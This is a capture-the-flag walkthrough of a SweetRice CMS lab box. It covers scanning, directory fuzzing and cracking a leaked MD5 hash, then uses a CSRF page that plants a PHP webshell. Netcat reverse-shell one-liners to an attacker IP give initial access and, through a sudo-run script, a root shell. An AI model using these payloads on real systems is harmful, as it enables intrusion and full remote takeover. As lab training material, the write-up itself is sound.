initial Enumeration
āÆ nmap -sCV 10.10.115.33
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 01:26 WAT
Nmap scan report for 10.10.115.33
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.12 seconds
- visit port
80:
- now let FUZZ for hidden directory:
ffuf -u http://10.10.115.33/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 11321
- we found
/contentslet see whatās there:
- nothing much there let
fuzzfor sub-directories here:
ffuf -u http://10.10.115.33/content/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 2198
- okay i was checking the directories one-by-one and found some cool stuff in the
/content/inc/and/content/as/
- i found a hash in the
databasefile, now let crack it: - the hash is likely an
md5hash
- no going to the
/content/asdirectory it has a log-in form so i test the manager creds i just crack and it works:
- from the above screen i was able to see the version of the
SweetRiceCMS, so i searched for possible exploit:
- i edited the code to fit my need:
<html>
<body onload="document.exploit.submit();">
<form action="http://10.10.115.33/content/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
</textarea>
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://10.10.115.33/content/inc/ads/hacked.php
-->
- i save the exploit into a
.htmlfile and on my terminal i runFirefox <filename.html>, this will open up Firefox and execute the payload against theSweetRiceserver:
- when it open up your Firefox click on the tick sign and visit
http://10.10.115.33/content/inc/ads/hacked.phpto confirm thePOC:
- now i can modify the exploit to get a webshell/reverse shell:
<html>
<body onload="document.exploit.submit();">
<form action="http://10.10.115.33/content/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="webshell"/>
<textarea type="hidden" name="adv">
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://10.10.115.33/content/inc/ads/webshell.php
-->
-
i save the exploit into a
.htmlfile and on my terminal i runFirefox <filename.html>, this will open up Firefox and execute the payload against theSweetRiceserver: -
when it open up Firefox donāt forget to click on the tick box and visit the url
http://10.10.115.33/content/inc/ads/webshell.php
- now i can start up a listener and enter in this reverse shell command:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.3.128 1337 >/tmp/f
- stabilize shell with:
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL Z [KEY]
stty raw -echo;fg
export TERM=xterm
stty rows 40 cols 160
- now we are in we can move to the
/homesdirectory to check if we have permission to read the user flag:
- and surprisingly we do š
privilege Escalation:
running sudo -l i see that the itguy user can run sudo with a perl binary combined ith a file in his directory:
- but the
itguyuser donāt haveWRITEpermission to the file only read - so i check the content of the file and found that that file is execute another file the the
itguyhasWRITEpermissions too š„²:
- so what i we have to do is change the content of the
copy.shfile to a reverse shell code so when it execute we will get a root shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.3.128 1336 >/tmp/f
- then execute the command we have sudo privilege with (start listener first):
- root flag:
